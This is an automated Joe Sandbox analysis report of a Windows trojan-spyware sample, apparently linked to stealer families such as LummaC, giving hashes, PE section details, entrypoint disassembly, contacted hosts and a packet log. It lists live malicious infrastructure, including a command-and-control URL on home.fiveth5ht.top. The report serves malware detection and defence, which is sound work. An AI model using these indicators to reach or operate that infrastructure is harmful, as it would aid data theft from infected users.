http://html4/loose.dtd | xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/alt-svc.html# | xdeRtWCeNH.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | xdeRtWCeNH.exe, 00000000.00000003.1569250697.0000000001A32000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://httpbin.org/ipbefore | xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/http-cookies.html | xdeRtWCeNH.exe, xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
https://curl.se/docs/hsts.html# | xdeRtWCeNH.exe | false | | high
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxS | xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp | false | | high
https://curl.se/docs/http-cookies.html# | xdeRtWCeNH.exe | false | | high
https://curl.se/docs/alt-svc.html | xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.css | xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
http://.jpg | xdeRtWCeNH.exe, 00000000.00000002.1589659327.0000000000C31000.00000040.00000001.01000000.00000003.sdmp, xdeRtWCeNH.exe, 00000000.00000003.1453921435.0000000007690000.00000004.00001000.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
81.29.149.125 | home.fiveth5ht.top | Switzerland | 39616 | COMUNICA_IT_SERVICESCH | false
3.218.7.103 | httpbin.org | United States | 14618 | AMAZON-AESUS | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1581579
Start date and time: 2024-12-28 09:28:17 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 25s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 5
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: xdeRtWCeNH.exe (renamed because the original name is a hash value)
Original Sample Name: abcff1e6ac84a5ec546b6672ce45bf02.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:
• Successful, ratio: 100%
HCA Information: Failed
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
• Excluded IPs from analysis (whitelisted): 172.202.163.200
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
03:29:41 | API Interceptor | 4x Sleep call for process: xdeRtWCeNH.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
3.218.7.103 | E205fJJS1Q.exe | malicious | LummaC
3.218.7.103 | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT
3.218.7.103 | QzK1LCSuq2.exe | malicious | LummaC
3.218.7.103 | OoYYtngD7d.exe | malicious | Unknown
3.218.7.103 | NWJ4JvzFcs.exe | malicious | Unknown
3.218.7.103 | EwhnoHx0n5.exe | malicious | Unknown
3.218.7.103 | PqHnYMj5eF.exe | malicious | Unknown
3.218.7.103 | YrxiR3yCLm.exe | malicious | LummaC
3.218.7.103 | qZA8AyGxiA.exe | malicious | Unknown
3.218.7.103 | Cph7VEeu1r.exe | malicious | LummaC
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
httpbin.org | f7qbEfJl0B.exe | malicious | Unknown | 34.226.108.155
httpbin.org | E205fJJS1Q.exe | malicious | LummaC | 3.218.7.103
httpbin.org | 5KwhHEdmM4.exe | malicious | Unknown | 34.226.108.155
httpbin.org | QzK1LCSuq2.exe | malicious | LummaC | 3.218.7.103
httpbin.org | dZsdMl5Pwl.exe | malicious | Unknown | 34.226.108.155
httpbin.org | OAKPYEH4c6.exe | malicious | LummaC | 34.226.108.155
httpbin.org | ZTM2pfyhu3.exe | malicious | LummaC | 34.226.108.155
httpbin.org | BkB1ur7aFW.exe | malicious | Unknown | 34.226.108.155
httpbin.org | OoYYtngD7d.exe | malicious | Unknown | 3.218.7.103
httpbin.org | NWJ4JvzFcs.exe | malicious | Unknown | 3.218.7.103
home.fiveth5ht.top | f7qbEfJl0B.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | 5KwhHEdmM4.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | dZsdMl5Pwl.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | BkB1ur7aFW.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | OoYYtngD7d.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | NWJ4JvzFcs.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | EwhnoHx0n5.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | PqHnYMj5eF.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | qZA8AyGxiA.exe | malicious | Unknown | 5.101.3.217
home.fiveth5ht.top | 4o4t8dO4r1.exe | malicious | Unknown | 5.101.3.217
Match | Associated Sample Name / URL | Detection | Threat Name | Context (IP)
COMUNICA_IT_SERVICESCH | file.exe | malicious | LummaC, Amadey, LummaC Stealer, RHADAMANTHYS | 81.29.149.45
COMUNICA_IT_SERVICESCH | hmips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | ppc.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | mips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | x86.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | hmips.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | arm5.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | ppc.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | harm4.elf | malicious | Unknown | 81.29.149.178
COMUNICA_IT_SERVICESCH | harm5.elf | malicious | Unknown | 81.29.149.178
AMAZON-AESUS | https://fin.hiringplatform.ca/processes/197662-tax-legislation-officer-ec-06-ec-07?locale=en | malicious | Unknown | 54.225.146.64
AMAZON-AESUS | d8tp5flwzP.exe | malicious | Metasploit | 18.209.65.151
AMAZON-AESUS | f7qbEfJl0B.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | E205fJJS1Q.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | 5KwhHEdmM4.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | w22319us3M.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar, zgRAT | 3.218.7.103
AMAZON-AESUS | QzK1LCSuq2.exe | malicious | LummaC | 3.218.7.103
AMAZON-AESUS | dZsdMl5Pwl.exe | malicious | Unknown | 34.226.108.155
AMAZON-AESUS | OAKPYEH4c6.exe | malicious | LummaC | 34.226.108.155
AMAZON-AESUS | ZTM2pfyhu3.exe | malicious | LummaC | 34.226.108.155
                                                      No context
                                                      No context
                                                      No created / dropped files found
File type: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.983557857667435
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• VXD Driver (31/22) 0.00%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: xdeRtWCeNH.exe
File size: 4'452'352 bytes (0x43f000)
MD5: abcff1e6ac84a5ec546b6672ce45bf02
SHA1: e5e8c81f0b1d2ea23adbe79d5a69318a7212bbea
SHA256: 3649c7b868952aa06caef1e133c8f4bdcc2a92763380c7e69af4e2f891afd466
SHA512: 010d13c525854f55eecae7900d3a2637efc17f45e23d2915aa61fd8d1ea18a6b0d41cf08f9404ef5834cbd010af60fd7c90f7ad564fb96560a03f28c0422c40e
SSDEEP: 98304:mvvsqWkkoPBI4gzTwyc7/fa2y9lqqPBHIBCcD:m3okkoPBI3z031y9l1HWC8
TLSH: 3726331A5898A727F44848F6BCB194BEF0D6B19A049EEFABF801E474065F6403F9479C
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._.lg...............(..I...p..2........... I...@...................................D...@... ............................
Icon Hash: 00928e8e8686b000
Entrypoint: 0x101e000 (RVA 0xc1e000, i.e. the first byte of the .taggant section rather than a standard code section)
Entrypoint Section: .taggant
Digitally signed: true (the optional header advertises a certificate table, but IMAGE_DIRECTORY_ENTRY_SECURITY points to file offset 0x708a00, which lies beyond the 0x43f000-byte file; no certificate could therefore be read, the signature fields below are empty, and the file should be treated as unsigned)
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
DLL Characteristics: DYNAMIC_BASE
Time Stamp: 0x676CDB5F [Thu Dec 26 04:28:15 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After:
Subject Chain:
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:
Instruction (entry point disassembly at 0x101e000 in .taggant; only the initial jmp is executed code, the remainder of the section is mostly zero-filled data, which an x86 disassembler renders as the two-byte opcode 00 00 = add byte ptr [eax], al)
                                                          jmp 00007FAD4C7A95FAh
                                                          bswap esi
                                                          inc ebx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add cl, ch
                                                          add byte ptr [eax], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx+ecx], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          xor byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [edx], ah
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [ecx], al
                                                          add byte ptr [eax], 00000000h
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          adc byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add dword ptr [edx], ecx
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6dd05f | 0x73 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6dc000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x708a00 | 0x688 | (none: this entry is a file offset, and 0x708a00 is past the 0x43f000-byte end of file)
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc1c7f8 | 0x10 | kzctzxho
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc1c7a8 | 0x18 | kzctzxho
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(no name) | 0x1000 | 0x6db000 | 0x288a00 | 27deebb1c1213e01098bb827e4000536 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x6dc000 | 0x1ac | 0x200 | d7a923ab2b79e9c7081efcd888e03d9c | False | 0.58203125 | data | 4.544064081184443 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x6dd000 | 0x1000 | 0x200 | 6363462e4ea156e03144265f6be7871e | False | 0.166015625 | data | 1.1763897754724144 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(no name) | 0x6de000 | 0x38c000 | 0x200 | c9b8428eb5c1f00dd69f8c36bd7f50f5 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
kzctzxho | 0xa6a000 | 0x1b3000 | 0x1b2a00 | 4467db0e1d9a9d155ca91adb5656ebbe | False | 0.9944327230730515 | data | 7.955934839357001 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
czecwivl | 0xc1d000 | 0x1000 | 0x400 | cb9d2727c51bd106494bfdb11dec4a34 | False | 0.791015625 | data | 6.2389087859952035 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0xc1e000 | 0x3000 | 0x2200 | 7b66aa9b2994d7b7fb2e35b1dc817464 | False | 0.05813419117647059 | DOS executable (COM) | 0.660380658694278 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0xc1c808 | 0x152 | ASCII text, with CRLF line terminators | | | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 28, 2024 09:29:35.461666107 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:35.461713076 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:35.461808920 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:35.474874973 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:35.474889994 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.210406065 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.211106062 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.211126089 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.213038921 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.213184118 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.214818954 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.214915991 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.214965105 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.261147022 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.261161089 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.307447910 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.536411047 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.536550045 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:37.536633968 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.545764923 CET | 49703 | 443 | 192.168.2.7 | 3.218.7.103
Dec 28, 2024 09:29:37.545793056 CET | 443 | 49703 | 3.218.7.103 | 192.168.2.7
Dec 28, 2024 09:29:40.689887047 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.809380054 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.811203003 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.812309980 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.932755947 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.932847977 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.932852983 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.932890892 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.932905912 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.932910919 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.932923079 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.932946920 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.932969093 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.933185101 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.933216095 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.933254957 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.933264017 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.933268070 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.933284044 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:40.933316946 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:40.933363914 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.052459002 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052467108 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052535057 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052576065 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.052580118 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052584887 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052594900 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.052685022 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.097419024 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.097570896 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.213355064 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.214005947 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.261339903 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.377372980 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.377427101 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.577410936 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.578622103 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.825345993 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.825445890 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.868716955 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.868988037 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.869066000 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.944931984 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.945132017 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988584042 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988600969 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988619089 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988648891 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988670111 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988702059 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988744974 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988784075 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988837004 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988858938 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988899946 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.988962889 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.988972902 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989016056 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989064932 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989074945 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989111900 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989119053 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989144087 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989222050 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989270926 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989386082 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989434958 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989489079 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989536047 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.989542007 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989649057 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989722967 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989770889 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989860058 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.989988089 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990041971 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990120888 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990186930 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990281105 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990353107 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990396976 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990472078 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990535021 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.990571022 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990580082 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990602970 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990608931 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.990628958 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.990648985 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:41.990679979 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
Dec 28, 2024 09:29:41.990717888 CET | 49704 | 80 | 192.168.2.7 | 81.29.149.125
Dec 28, 2024 09:29:42.033373117 CET | 80 | 49704 | 81.29.149.125 | 192.168.2.7
